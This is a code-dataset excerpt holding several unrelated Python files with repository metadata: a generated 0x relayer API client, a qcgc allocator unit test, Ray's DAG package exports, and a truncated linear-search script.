>>> thread = api.get_asset_pairs_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str asset_data_a: The assetData value for the first asset in the pair.
:param str asset_data_b: The assetData value for the second asset in the pair.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiAssetDataPairsResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
local_var_params = locals()
all_params = [
"asset_data_a",
"asset_data_b",
"network_id",
"page",
"per_page",
]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_asset_pairs" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "asset_data_a" in local_var_params:
query_params.append(
("assetDataA", local_var_params["asset_data_a"])
)
if "asset_data_b" in local_var_params:
query_params.append(
("assetDataB", local_var_params["asset_data_b"])
)
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/asset_pairs",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiAssetDataPairsResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_fee_recipients(self, **kwargs):
"""get_fee_recipients
Retrieves a collection of all fee recipient addresses for a relayer.
This endpoint should be paginated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_fee_recipients(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiFeeRecipientsResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_fee_recipients_with_http_info(**kwargs)
else:
(data) = self.get_fee_recipients_with_http_info(**kwargs)
return data
def get_fee_recipients_with_http_info(self, **kwargs):
"""get_fee_recipients
Retrieves a collection of all fee recipient addresses for a relayer.
This endpoint should be paginated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_fee_recipients_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiFeeRecipientsResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = ["network_id", "page", "per_page"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fee_recipients" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/fee_recipients",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiFeeRecipientsResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_order(self, order_hash, **kwargs):
"""get_order
Retrieves the 0x order with meta info that is associated with the hash.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str order_hash: The hash of the desired 0x order. (required)
:param float network_id: The id of the Ethereum network
:return: :class:`RelayerApiOrderSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_order_with_http_info(order_hash, **kwargs)
else:
(data) = self.get_order_with_http_info(order_hash, **kwargs)
return data
def get_order_with_http_info(self, order_hash, **kwargs):
"""get_order
Retrieves the 0x order with meta info that is associated with the hash.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str order_hash: The hash of the desired 0x order. (required)
:param float network_id: The id of the Ethereum network
:return: :class:`RelayerApiOrderSchema`.
If the method is called asynchronously returns the request thread.
"""
local_var_params = locals()
all_params = ["order_hash", "network_id"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_order" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'order_hash' is set
if (
"order_hash" not in local_var_params
or local_var_params["order_hash"] is None
):
raise ValueError(
"Missing the required parameter `order_hash` when calling `get_order`"
)
collection_formats = {}
path_params = {}
if "order_hash" in local_var_params:
path_params["orderHash"] = local_var_params["order_hash"]
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/order/{orderHash}",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrderSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_order_config(self, **kwargs):
"""get_order_config
Relayers have full discretion over the orders that they are willing
to host on their orderbooks (e.g what fees they charge, etc...). In
order for traders to discover their requirements programmatically,
they can send an incomplete order to this endpoint and receive the
missing fields, specifc to that order. This gives relayers a large
amount of flexibility to tailor fees to unique traders, trading pairs
and volume amounts. Submit a partial order and receive information
required to complete the order: `senderAddress`,
`feeRecipientAddress`, `makerFee`, `takerFee`.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order_config(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param relayer_api_order_config_payload_schema: instance of
:class:`RelayerApiOrderConfigPayloadSchema`. The fields of a 0x
order the relayer may want to decide what configuration to send
back.
:return: :class:`RelayerApiOrderConfigResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_order_config_with_http_info(**kwargs)
else:
(data) = self.get_order_config_with_http_info(**kwargs)
return data
def get_order_config_with_http_info(self, **kwargs):
"""get_order_config
Relayers have full discretion over the orders that they are willing
to host on their orderbooks (e.g what fees they charge, etc...). In
order for traders to discover their requirements programmatically,
they can send an incomplete order to this endpoint and receive the
missing fields, specifc to that order. This gives relayers a large
amount of flexibility to tailor fees to unique traders, trading pairs
and volume amounts. Submit a partial order and receive information
required to complete the order: `senderAddress`,
`feeRecipientAddress`, `makerFee`, `takerFee`.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order_config_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param relayer_api_order_config_payload_schema: instance of
:class: `RelayerApiOrderConfigPayloadSchema`. The fields of a 0x
order the relayer may want to decide what configuration to send
back.
:return: :class:`RelayerApiOrderConfigResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
local_var_params = locals()
all_params = ["network_id", "relayer_api_order_config_payload_schema"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_order_config" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "relayer_api_order_config_payload_schema" in local_var_params:
body_params = local_var_params[
"relayer_api_order_config_payload_schema"
]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type(["application/json"])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/order_config",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrderConfigResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_orderbook(self, base_asset_data, quote_asset_data, **kwargs):
"""get_orderbook
Retrieves the orderbook for a given asset pair. This endpoint should
be paginated. Bids will be sorted in
descending order by price, and asks will be sorted in ascending order
by price. Within the price sorted orders, the orders are further
sorted by **taker fee price** which is defined as the **takerFee**
divided by **takerTokenAmount**. After **taker fee price**, orders are
to be sorted by expiration in ascending order. The way pagination
works for this endpoint is that the **page** and **perPage** query
params apply to both `bids` and `asks` collections, and if `page` *
`perPage` = `total` for a certain collection, the `records` for that
collection should just be empty.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orderbook(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str base_asset_data: assetData (makerAssetData or
takerAssetData) designated as the base currency in the
`currency pair calculation
<https://en.wikipedia.org/wiki/Currency_pair>`__
of price. (required)
:param str quote_asset_data: assetData (makerAssetData or
takerAssetData) designated as the quote currency in the currency
pair calculation of price. (required)
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiOrderbookResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_orderbook_with_http_info(
base_asset_data, quote_asset_data, **kwargs
)
else:
(data) = self.get_orderbook_with_http_info(
base_asset_data, quote_asset_data, **kwargs
)
return data
def get_orderbook_with_http_info(
self, base_asset_data, quote_asset_data, **kwargs
):
"""get_orderbook
Retrieves the orderbook for a given asset pair. This endpoint should
be paginated. Bids will be sorted in
descending order by price, and asks will be sorted in ascending order
by price. Within the price sorted orders, the orders are further
sorted by **taker fee price** which is defined as the **takerFee**
divided by **takerTokenAmount**. After **taker fee price**, orders are
to be sorted by expiration in ascending order. The way pagination
works for this endpoint is that the **page** and **perPage** query
params apply to both `bids` and `asks` collections, and if `page` *
`perPage` = `total` for a certain collection, the `records` for that
collection should just be empty.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orderbook_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str base_asset_data: assetData (makerAssetData or
takerAssetData) designated as the base currency in the
`currency pair calculation
<https://en.wikipedia.org/wiki/Currency_pair>`__
of price. (required)
:param str quote_asset_data: assetData (makerAssetData or
takerAssetData) designated as the quote currency in the currency
pair calculation of price. (required)
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiOrderbookResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = [
"base_asset_data",
"quote_asset_data",
"network_id",
"page",
"per_page",
]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_orderbook" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'base_asset_data' is set
if (
"base_asset_data" not in local_var_params
or local_var_params["base_asset_data"] is None
):
raise ValueError(
"Missing the required parameter `base_asset_data`"
"when calling `get_orderbook`"
)
# verify the required parameter 'quote_asset_data' is set
if (
"quote_asset_data" not in local_var_params
or local_var_params["quote_asset_data"] is None
):
raise ValueError(
"Missing the required parameter `quote_asset_data`"
" when calling `get_orderbook`"
)
collection_formats = {}
path_params = {}
query_params = []
if "base_asset_data" in local_var_params:
query_params.append(
("baseAssetData", local_var_params["base_asset_data"])
)
if "quote_asset_data" in local_var_params:
query_params.append(
("quoteAssetData", local_var_params["quote_asset_data"])
)
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/orderbook",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrderbookResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_orders(self, **kwargs):
"""get_orders
Retrieves a list of orders given query parameters. This endpoint
should be paginated. For querying an entire
orderbook snapshot, the orderbook endpoint
is recommended. If both makerAssetData and takerAssetData are
specified, returned orders will be sorted by price determined by
(takerTokenAmount/makerTokenAmount) in ascending order. By default,
orders returned by this endpoint are unsorted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orders(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str maker_asset_proxy_id: The maker
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str taker_asset_proxy_id: The taker asset
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str maker_asset_address: The contract address for the maker asset.
:param str taker_asset_address: The contract address for the taker asset.
:param str exchange_address: Same as exchangeAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str sender_address: Same as senderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_asset_data: Same as makerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_asset_data: Same as takerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_asset_data: Same as traderAssetData in the [0x
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_address: Same as makerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_address: Same as takerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_address: Same as traderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str fee_recipient_address: Same as feeRecipientAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiOrdersResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_orders_with_http_info(**kwargs)
else:
(data) = self.get_orders_with_http_info(**kwargs)
return data
def get_orders_with_http_info(self, **kwargs):
"""get_orders
Retrieves a list of orders given query parameters. This endpoint
should be paginated. For querying an entire
orderbook snapshot, the orderbook endpoint
is recommended. If both makerAssetData and takerAssetData are
specified, returned orders will be sorted by price determined by
(takerTokenAmount/makerTokenAmount) in ascending order. By default,
orders returned by this endpoint are unsorted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orders_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str maker_asset_proxy_id: The maker
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str taker_asset_proxy_id: The taker asset
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str maker_asset_address: The contract address for the maker asset.
:param str taker_asset_address: The contract address for the taker asset.
:param str exchange_address: Same as exchangeAddress in the [0x
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str sender_address: Same as senderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_asset_data: Same as makerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_asset_data: Same as takerAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_asset_data: Same as traderAssetData in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str maker_address: Same as makerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str taker_address: Same as takerAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str trader_address: Same as traderAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param str fee_recipient_address: Same as feeRecipientAddress in the
`0x Protocol v2 Specification
<https://github.com/0xProject/0x-protocol-specification/blob/
master/v2/v2-specification.md#order-message-format>`__
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: RelayerApiOrdersResponseSchema.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = [
"maker_asset_proxy_id",
"taker_asset_proxy_id",
"maker_asset_address",
"taker_asset_address",
"exchange_address",
"sender_address",
"maker_asset_data",
"taker_asset_data",
"trader_asset_data",
"maker_address",
"taker_address",
"trader_address",
"fee_recipient_address",
"network_id",
"page",
"per_page",
]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_orders" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "maker_asset_proxy_id" in local_var_params:
query_params.append(
("makerAssetProxyId", local_var_params["maker_asset_proxy_id"])
)
if "taker_asset_proxy_id" in local_var_params:
query_params.append(
("takerAssetProxyId", local_var_params["taker_asset_proxy_id"])
)
if "maker_asset_address" in local_var_params:
query_params.append(
("makerAssetAddress", local_var_params["maker_asset_address"])
)
if "taker_asset_address" in local_var_params:
query_params.append(
("takerAssetAddress", local_var_params["taker_asset_address"])
)
if "exchange_address" in local_var_params:
query_params.append(
("exchangeAddress", local_var_params["exchange_address"])
)
if "sender_address" in local_var_params:
query_params.append(
("senderAddress", local_var_params["sender_address"])
)
if "maker_asset_data" in local_var_params:
query_params.append(
("makerAssetData", local_var_params["maker_asset_data"])
)
if "taker_asset_data" in local_var_params:
query_params.append(
("takerAssetData", local_var_params["taker_asset_data"])
)
if "trader_asset_data" in local_var_params:
query_params.append(
("traderAssetData", local_var_params["trader_asset_data"])
)
if "maker_address" in local_var_params:
query_params.append(
("makerAddress", local_var_params["maker_address"])
)
if "taker_address" in local_var_params:
query_params.append(
("takerAddress", local_var_params["taker_address"])
)
if "trader_address" in local_var_params:
query_params.append(
("traderAddress", local_var_params["trader_address"])
)
if "fee_recipient_address" in local_var_params:
query_params.append(
(
"feeRecipientAddress",
local_var_params["fee_recipient_address"],
)
)
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/orders",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrdersResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def post_order(self, **kwargs):
"""post_order
Submit a signed order to the relayer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.post_order(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param signed_order_schema: Instance of :class:`SignedOrderSchema`.
A valid signed 0x order based on the schema.
:return: None.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.post_order_with_http_info(**kwargs)
else:
(data) = self.post_order_with_http_info(**kwargs)
return data
def post_order_with_http_info(self, **kwargs):
"""post_order
Submit a signed order to the relayer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.post_order_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param signed_order_schema: Instance of :class:`SignedOrderSchema`
A valid signed 0x order based on the schema.
:return: None.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = ["network_id", "signed_order_schema"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_order" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "signed_order_schema" in local_var_params:
body_params = local_var_params["signed_order_schema"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type(["application/json"])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/order",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
| 41.52583 | 91 | 0.630826 |
89f22eb82b36c1ca4e1014553f66004d5056e4ab | 867 | py | Python | test/test_allocator_switch.py | ntruessel/qcgc | e3ed7fc854d07aea98f5f09525ff43c867724c70 | [
"MIT"
] | 74 | 2016-05-21T17:34:20.000Z | 2021-12-23T04:28:00.000Z | test/test_allocator_switch.py | ntruessel/qcgc | e3ed7fc854d07aea98f5f09525ff43c867724c70 | [
"MIT"
] | 3 | 2017-04-03T15:18:50.000Z | 2017-04-03T15:29:55.000Z | test/test_allocator_switch.py | ntruessel/qcgc | e3ed7fc854d07aea98f5f09525ff43c867724c70 | [
"MIT"
] | 3 | 2017-01-01T05:15:06.000Z | 2020-10-07T13:37:55.000Z | from support import lib,ffi
from qcgc_test import QCGCTest
import unittest
class AllocatorSwitchTest(QCGCTest):
    def test_simple_switch(self):
        """Fill the arena, collect, and check the bump allocator stays off.

        After qcgc_reset_bump_ptr() + qcgc_collect(), the bump allocator's
        ptr/end must be NULL, and must remain NULL even after one more
        allocation.
        """
        capacity = lib.qcgc_arena_cells_count - lib.qcgc_arena_first_cell_index - 1
        allocated = []
        for _ in range(capacity):
            obj = self.allocate(1)
            self.push_root(obj)
            allocated.append(obj)
        #
        for obj in allocated:
            self.assertEqual(self.get_blocktype(ffi.cast("cell_t *", obj)), lib.BLOCK_WHITE)
        lib.qcgc_reset_bump_ptr()
        lib.qcgc_collect()
        self.assertEqual(lib._qcgc_bump_allocator.ptr, ffi.NULL)
        self.assertEqual(lib._qcgc_bump_allocator.end, ffi.NULL)
        self.allocate(1)
        self.assertEqual(lib._qcgc_bump_allocator.ptr, ffi.NULL)
        self.assertEqual(lib._qcgc_bump_allocator.end, ffi.NULL)
if __name__ == "__main__":
unittest.main()
| 33.346154 | 89 | 0.665513 |
a764e90b06d37cfb03189f414afa48d868159e0b | 343 | py | Python | python/ray/experimental/dag/__init__.py | dsctt/ray | 29d94a22114b02adfd3745c4991a3ce70592dd16 | [
"Apache-2.0"
] | 1 | 2022-03-22T11:17:22.000Z | 2022-03-22T11:17:22.000Z | python/ray/experimental/dag/__init__.py | dsctt/ray | 29d94a22114b02adfd3745c4991a3ce70592dd16 | [
"Apache-2.0"
] | 32 | 2021-11-06T07:11:42.000Z | 2022-03-19T07:14:00.000Z | python/ray/experimental/dag/__init__.py | dsctt/ray | 29d94a22114b02adfd3745c4991a3ce70592dd16 | [
"Apache-2.0"
] | null | null | null | from ray.experimental.dag.dag_node import DAGNode
from ray.experimental.dag.function_node import FunctionNode
from ray.experimental.dag.class_node import ClassNode, ClassMethodNode
from ray.experimental.dag.input_node import InputNode
__all__ = [
"ClassNode",
"ClassMethodNode",
"DAGNode",
"FunctionNode",
"InputNode",
]
| 24.5 | 70 | 0.769679 |
b14343fd25759a48f7df674a18b52b9ad1862851 | 355 | py | Python | search/linear_search/python/linear_search.py | AsociTon/hacktoberfest-2018 | 1d90736ba2ef68233019230e26a3813a7d3b85f6 | [
"MIT"
] | 26 | 2018-10-01T14:52:06.000Z | 2021-05-29T06:06:50.000Z | search/linear_search/python/linear_search.py | AsociTon/hacktoberfest-2018 | 1d90736ba2ef68233019230e26a3813a7d3b85f6 | [
"MIT"
] | 89 | 2018-10-01T14:58:36.000Z | 2019-10-07T15:30:45.000Z | search/linear_search/python/linear_search.py | AsociTon/hacktoberfest-2018 | 1d90736ba2ef68233019230e26a3813a7d3b85f6 | [
"MIT"
] | 147 | 2018-10-01T12:31:40.000Z | 2021-05-09T16:12:44.000Z | print("PROGRAM FOR LINEAR SEARCH")
array = [44, 1, 55, 23, 54, 6546, 234, 987]
while True:
    query = int(input("Enter element to search in array:"))
    # BUG FIX: 'found' must be reset for every query. Previously it was set
    # once before the loop, so after the first successful search
    # "Element not in array" could never be printed again.
    found = 0
    for i, value in enumerate(array):
        if value == query:
            print("Element found at index {}".format(i))
            found = 1
